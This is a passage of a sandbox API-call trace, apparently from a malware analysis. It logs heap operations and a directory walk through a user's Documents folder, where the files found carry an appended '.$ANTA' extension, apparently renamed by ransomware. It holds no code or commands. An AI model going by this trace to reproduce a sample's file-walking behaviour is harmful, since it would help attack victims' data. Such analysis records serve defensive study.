Flags=0x0, Size=0x10) returned 0x43cb138 [0083.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x120) returned 0x43ccec8 [0083.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4051040 | out: hHeap=0x1780000) returned 1 [0083.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0083.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0083.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0083.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0083.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0083.454] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0083.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0083.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0083.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0083.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0083.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0083.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0083.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0083.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0083.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0083.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0083.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0083.454] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0083.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0083.454] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0083.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0083.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0083.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0083.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0083.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0083.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0083.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0083.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0083.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0083.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0083.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0083.455] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0083.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0083.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0083.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0083.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0083.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.455] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd")) returned 0x10 [0083.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0083.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0083.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0083.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0083.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0083.456] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0083.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0083.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0083.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0083.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0083.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0083.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0083.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0083.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0083.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0083.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0083.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0083.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb300 [0083.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0083.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0083.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0083.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0083.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0083.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0083.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0083.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0083.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0083.457] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0083.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0083.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0083.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0083.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0083.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0083.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0083.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0083.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0083.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0083.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0083.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0083.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0083.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0083.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.457] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0083.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0083.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0083.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0083.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0083.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0083.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0083.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0083.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0083.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0083.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0083.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0083.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0083.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0083.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0083.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0083.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0083.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0083.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0083.458] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\*", lpFindFileData=0x144e348 | out: lpFindFileData=0x144e348*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5be40c0, ftCreationTime.dwHighDateTime=0x1d5eb3b, ftLastAccessTime.dwLowDateTime=0xfddf5a1d, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfddf5a1d, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43cb240, cFileName=".", cAlternateFileName="")) returned 0x41ac600 [0083.459] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144e348 | out: lpFindFileData=0x144e348*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5be40c0, ftCreationTime.dwHighDateTime=0x1d5eb3b, ftLastAccessTime.dwLowDateTime=0xfddf5a1d, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfddf5a1d, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43cb240, cFileName="..", cAlternateFileName="")) returned 1 [0083.459] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144e348 | out: lpFindFileData=0x144e348*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd5723d9, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfd5723d9, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfd5be6af, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x5580, dwReserved0=0x0, dwReserved1=0x43cb240, cFileName="bVjgYdkDx.odt.$ANTA", cAlternateFileName="BVJGYD~1.$AN")) returned 1 [0083.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0083.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0083.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0083.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0083.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0083.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0083.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0083.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0083.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0083.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.459] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0083.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0083.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0083.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0083.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.459] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0083.460] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0083.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0083.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0083.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0083.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0083.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0083.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0083.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0083.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0083.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0083.460] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0083.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0083.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0083.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.460] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0083.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0083.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0083.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0083.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d10 [0083.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0083.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0083.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0083.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0083.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0083.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb348 [0083.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb360 [0083.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0083.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0083.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0083.461] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.461] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0083.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0083.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0083.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.462] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd68439a, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfd68439a, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfd6c982f, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x157e0, dwReserved0=0x144e828, dwReserved1=0x8, cFileName="F0N0.rtf.$ANTA", cAlternateFileName="F0N0RT~1.$AN")) returned 1 [0083.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0083.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0083.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0083.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0083.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0083.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0083.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0083.462] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0083.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0083.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0083.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.462] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0083.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0083.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0083.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0083.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c40 [0083.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0083.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0083.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 